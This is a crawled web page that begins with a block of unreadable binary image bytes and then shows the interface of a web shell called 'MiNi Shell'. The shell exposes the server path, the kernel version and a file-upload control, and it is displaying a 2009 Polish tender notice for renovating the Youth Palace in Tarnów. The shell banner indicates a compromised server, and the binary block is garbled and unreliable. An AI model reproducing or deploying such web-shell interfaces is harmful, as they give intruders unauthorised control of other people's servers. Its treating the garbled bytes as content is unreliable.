JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090319/69396-N-2009.html

<p class="kh_header"><b>Tarnów: Przebudowa budynków Pałacu Młodzieży - nowe funkcje w starych murach, Budynek główny I etap - Sala Wielofunkcyjna w Tarnowie przy ul Piłsudskiego.</b><br>
<b>Numer ogłoszenia: 69396 - 2009; data zamieszczenia: 19.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pałac Młodzieży , ul. Piłsudskiego 24, 33-100 Tarnów, woj. małopolskie, tel. 014 6220335, faks 014 6211541.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pm.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Placówka Gminy Miasta Tarnowa pracująca w systemie edukacji narodowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynków Pałacu Młodzieży - nowe funkcje w starych murach, Budynek główny I etap - Sala Wielofunkcyjna w Tarnowie przy ul Piłsudskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Roboty ogólnobudowlane:

W ramach I etapu robót - dotyczącego Sali Wielofunkcyjnej zaprojektowano:
- przebudowę strefy wejścia głównego obejmującą hall główny wraz z wiatrołapem,
- przebudowę sali wielofunkcyjnej wraz ze zmianą układu wejść (wyjść ewakuacyjnych),
- przebudowę korytarza północnego parteru dla dostosowania go do wymogów drogi ewakuacyjnej,
- przebudowę północnego pomieszczenia piwnic dla zlokalizowania w nim wentylatorni na potrzeby sali wielofunkcyjnej,
- przebudowę instalacji obsługujących w pomieszczeniach,
- budowę po zachodniej stronie budynku głównego wolnostojących czerpni i wyrzutni terenowej, podłączonych podziemnymi przewodami wentylacji mechanicznej do wentylatorowi usytuowanej w północnych pomieszczeniach piwnicznych.

Wyprzedzająco do robót wewnątrz budynku należy wykonać izolację przeciwwilgociową odcinającą w grubości murów metodą iniekcji i połączyć z izolacją poziomą.

2. Roboty rozbiórkowe piwnice:

- wykonanie demontażu okien oraz drzwi,
- wykonanie skuć uszkodzonych tynków i elementów posadzki,
- wykonanie przebić w ścianach pod przeprowadzenie przewodów wentylacyjnych,

3. Roboty rozbiórkowe parter:

- w hallu głównym wykonanie rozbiórki istniejących schodów wewnętrznych i pochylni
- w hallu głównym wykonanie rozbiórki istniejących ścianek obu pomieszczeń 
i wiatrołapu 
- w korytarzu północnym wykonanie, co najmniej na długości drogi ewakuacyjnej, demontażu palnych okładzin /boazerii/
- wykonanie rozbiórki posadzki korytarza w miejscu przebiegu wentylacji mechanicznej sali wielofunkcyjnej
- w sali wielofunkcyjnej wykonanie rozbiórki wszystkich elementów zniszczonej podłogi i kanałów podpodłogowych, 
- w sali wielofunkcyjnej wykonanie rozbiórki sceny,
- w sali wielofunkcyjnej wykonanie rozbiórki sterowani i wszystkich urządzeń, rampy itp.,
- w sali wielofunkcyjnej wykonanie rozbiórki okiennic i innych elementów wyposażenia jak okna, drzwi schodki itp.,
- w sali wielofunkcyjnej wykonanie demontażu konstrukcji sufitowych,
- wykonanie skuć zniszczonych fragmentów tynków,
- wykonanie przebić nowych wyjść do hallu oraz ze sceny na korytarz
- wykonanie wykuć bruzd i wnęk instalacyjnych oraz architektonicznych, zaznaczonych na rzucie projektu,
- wykonanie demontażu drzwi wejściowych wejścia głównego oraz północnego wejścia ewakuacyjnego,

4. Roboty budowlane i instalacyjne - zespół wiatrołapu, hallu i wejścia głównego:

- wykonanie przebudowy schodów wewnętrznych i pochylni dla niepełnosprawnych, dostosowując ją do wymogów przepisów
- wykonanie przeniesienia grzejnika c. o.,
- wykonanie zamurowania okienka w ścianie zewnętrznej i przeniesienia na tę ścianę tablic elektrycznych
- wykonanie przebicia do pomieszczenia sali wielofunkcyjnej,
- wyremontowanie drzwi zewnętrznych i dostosowanie ich do zmiennego poziomu posadzki,
- wykonanie montażu ścianki alu- szklanej wiatrołapu,
- wykonanie remontu tynków i wykonanie malowania po zakończeniu w/w robót,

5. Roboty budowlane i instalacyjne - korytarz północny parteru:

- wykonanie wymiany drzwi wejścia północnego,
- wykonanie demontażu boazerii wzdłuż drogi ewakuacyjnej,
- wykonanie zaprojektowanego przebicia nowego wejścia na scenę,
- wykonanie przejścia i wnęki instalacyjnej przewidzianych w projekcie,
- wykonanie remontu ściany i posadzki po zakończeniu w/w robót,

6. Roboty budowlane i instalacyjne - pomieszczenie Sali Wielofunkcyjnej:

- wykonanie przewidzianych projektem robót izolacyjnych, 
- wykonanie przewidzianych projektem robót instalacyjnych podposadzkowych,
- wykonanie przewidzianych projektem przebić i zamurowań,
- wykonanie zaprojektowanych instalacji,
- wykonanie nowych posadzek oraz schodów wewnętrznych na poziomach przewidzianych projektem,
- wykonanie montażu nowych drzwi i okien wraz z roletami światłoszczelnymi,
- wykonanie montażu obudowy instalacji oraz wykonanie sufitów podwieszanych,

7. Roboty budowlane piwnice północne - wentylatornia:

- wykonanie robót związanych z przebudową magazynu na wentylatornię,
- wykonanie przebicia ścian pod przejściem przewodów wentylacyjnych,
- wykonanie zamurowania okienka północnego,
- wykonanie robót instalacyjnych w wentylatorni, 
	
8. Roboty budowlane na zewnątrz budynku:

- wykonanie czerpni i wyrzutni wentylacji mechanicznej usytuowanej poza budynkiem jako wolnostojąca budowla,
- wykonanie przyłączenia wyrzutni przewodami podziemnymi z wentylatornią,
- wykonanie nadproży w nowoprojektowanych otworach drzwiowych,

9. Roboty budowlane niezbędne do wykonania wg projektów wykonawczych:

- wykonanie izolacji przeciwwilgociowych poziomych i pionowych przed przystąpieniem do pozostałych robót budowlanych
- wykonanie izolacji termicznej,
- wykonanie izolacji przeciwpożarowych stropów drewnianych i stalowo-drewnianych,
- wykonanie impregnacji przeciwpożarowych zgodnie z projektem,
- wykonanie robót wykończeniowych wewnętrznych,
- wykonanie robót wykończeniowych zewnętrznych jak chodniki, opaski z kostki betonowej, skucie zniszczonych tynków, odgrzybienie, prace izolatorskie, prace tynkarskie, itp. 
- wykonanie dostosowania obiektu dla osób niepełnosprawnych,

UWAGA !!!: 

1. wykonanie parkietu w Sali Wielofunkcyjnej, w części dotyczącej widowni nie wchodzi w zakres zamówienia i nie należy go wyceniać.

10. Instalacje:

10.1 wykonanie instalacji c.o.,
10.2 wykonanie instalacji wody do celów  p.poż.,
10.3 wykonanie instalacji wentylacji mechanicznej z ogrzewaniem powietrznym,
10.4 wykonanie instalacji rozdziału energii elektrycznej,
10.5 wykonanie instalacji oświetlenia i gniazd wtykowych ogólnego przeznaczenia,
10.6 wykonanie instalacji zasilania urządzeń siłowych (gniazda 3f),
10.7 wykonanie okablowania strukturalnego (teletechnicznego i komputerowego):
- wykonanie instalacji alarmowej,
- wykonanie instalacji nagłośnieniowej,
- wykonanie instalacji telewizyjnej,
- wykonanie instalacji połączeń wyrównawczych, 
- wykonanie instalacji sterowania i AKPiA wentylacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 25 000,00 zł (dwadzieścia pięć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności.
Ocena spełnienia warunku odbędzie się na podstawie dokumentu oraz oświadczenia - pkt a) i b). 

2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

a) o zamówienie mogą ubiegać się Wykonawcy, którzy zrealizowali w okresie ostatnich 5 lat (liczy się data wpisu do dziennika budowy lub zgłoszenia 
o zakończeniu budowy) przed dniem wszczęcia postępowania o udzielenie zamówienia (ogłoszenie w Biuletynie Zamówień Publicznych), a jeżeli okres prowadzenia działalności jest krótszy w tym okresie min. 2 roboty budowlane polegające na budowie, remoncie lub przebudowie budynku użyteczności publicznej lub budynku mieszkalnego wielorodzinnego, o wartości brutto nie mniejszej niż 500.000,- zł każda. Przy czym należyte i nie budzące zastrzeżeń wykonanie zamówienia potwierdzone musi być dokumentami poświadczającymi, że roboty zostały wykonane należycie - np. referencje, protokoły odbioru końcowego, opinie zamawiających, na rzecz których zamówienia zostały zrealizowane.

b) o zamówienie mogą ubiegać się wykonawcy, którzy dysponują:
- kierownikiem budowy z uprawnieniami do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń z minimum 3 letnim doświadczeniem zawodowym jako kierownik budowy- w tym z doświadczeniem w zakresie kierowania budową przynajmniej jednego obiektu budowlanego o kubaturze minimum 2.000 m3,
- kierownikiem robót elektrycznych posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, wymagane doświadczenie zawodowe jako kierownik budowy lub kierownik robót minimum 3 lata,
- kierownikiem robót instalacyjno - inżynieryjnych posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacji wody, kanalizacji, CO, wentylacji mechanicznej i klimatyzacji -wymagane doświadczenie zawodowe jako kierownik budowy lub kierownik robót minimum 3 lata,

Osoby te muszą posiadać aktualny wpis na listę członków właściwej izby samorządu zawodowego.
Wymaga się, aby zgłoszony przez Wykonawcę kierownik budowy był obecny na terenie budowy w trakcie realizacji robót.

Ocena spełnienia warunków odbędzie się na podstawie oświadczenia i dokumentów - pkt a), c), d) i e).

3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
O zamówienie mogą ubiegać się Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 500.000 zł. 

Ocena spełnienia warunku odbędzie się na podstawie oświadczenia i dokumentu - pkt a) i f).

3. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełnienia warunku odbędzie się na podstawie oświadczenia i dokumentów - pkt a) - g) oraz wykazu o którym mowa w art. 154 ust 5a ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a) oświadczenie z art. 22 ust.1 ustawy (wg załącznika Nr 2),
b) aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione 
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c) wykaz wykonanych robót budowlanych, w okresie ostatnich pięciu lat (liczy się data wpisu do dziennika budowy lub zgłoszenia zakończenia budowy), przed dniem wszczęcia postępowania o udzielenie zamówienia (ogłoszenie w Biuletynie Zamówień Publicznych), a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, w zakresie wymaganym punktem IV.3.2.a SIWZ, z podaniem przedmiotu zamówienia, ich wartości, zamawiających oraz daty i miejsca wykonania zamówienia (wg zał. Nr 3), oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. 
d) uprawnienia budowlane do kierowania robotami budowlanymi: 
- w specjalności konstrukcyjno - budowlanej bez ograniczeń,
- w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych,
- w specjalności instalacyjnej w zakresie instalacji wody, kanalizacji, CO, wentylacji mechanicznej i klimatyzacji. 
Uprawnienia jak wyżej należy dołączyć z aktualnymi wpisami na listę członków właściwej izby samorządu zawodowego (pkt.IV.3.2.b SIWZ).
e) wykaz osób, o których mowa (pkt.IV.3.2.b SIWZ) wraz z informacjami na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności 
(wg zał. Nr 6); ewentualnie przestawienie pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w w/w wykazie wykonawca wskazał osoby, którymi będzie dysponował,
f) Polisę, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności (pkt.IV.3.3 SIWZ),
g) dowód wpłaty lub wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pm.tarnow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Pałacu Młodzieży w Tarnowie, ul. Piłsudskiego 24, 33-100 Tarnów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2009 godzina 11:00, miejsce: Sekretariat Pałacu Młodzieży, 33-100 Tarnów, ul. Piłsudskiego 24.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com